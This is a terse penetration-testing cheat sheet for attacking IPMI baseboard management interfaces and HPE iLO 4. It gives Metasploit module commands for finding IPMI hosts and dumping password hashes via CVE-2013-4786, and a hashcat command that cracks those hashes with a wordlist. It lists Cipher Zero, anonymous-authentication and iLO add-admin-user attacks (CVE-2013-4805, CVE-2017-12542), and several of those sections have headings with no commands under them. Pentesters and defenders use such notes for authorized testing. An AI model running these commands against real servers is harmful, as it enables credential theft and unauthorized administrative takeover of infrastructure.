IPMI

• https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/

• https://habr.com/ru/company/selectel/blog/439834/

Discovery

msf > use auxiliary/scanner/ipmi/ipmi_version
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run

Dump Hashes

CVE-2013-4786

Dump hashes:

msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf > set OUTPUT_HASHCAT_FILE ipmi_hashes.txt
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run

Recover plaintext passwords:

$ hashcat -m 7300 -O -a 0 -w 3 --session=ipmi -o ipmi.out ipmi.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule --username

Cipher Zero

CVE-2013-4805

Discover with MSF:

Guess existing admin username. If ADMIN username is correct, the list command will succeed (password doesn't matter):

Add new admin user (only existing admin username is needed):

Anonymous Authentication

Can be discovered with MSF ipmi_dumphashes but also with ipmitool:

Change password of a named user account:

HPE iLO 4

• https://codeby.net/threads/poluchaem-dostup-k-hp-ilo.63224/

• https://github.com/airbus-seclab/ilo4_toolbox

Add Admin User

CVE-2017-12542

Exploit with Python:

• https://www.exploit-db.com/exploits/44005

Exploit with MSF: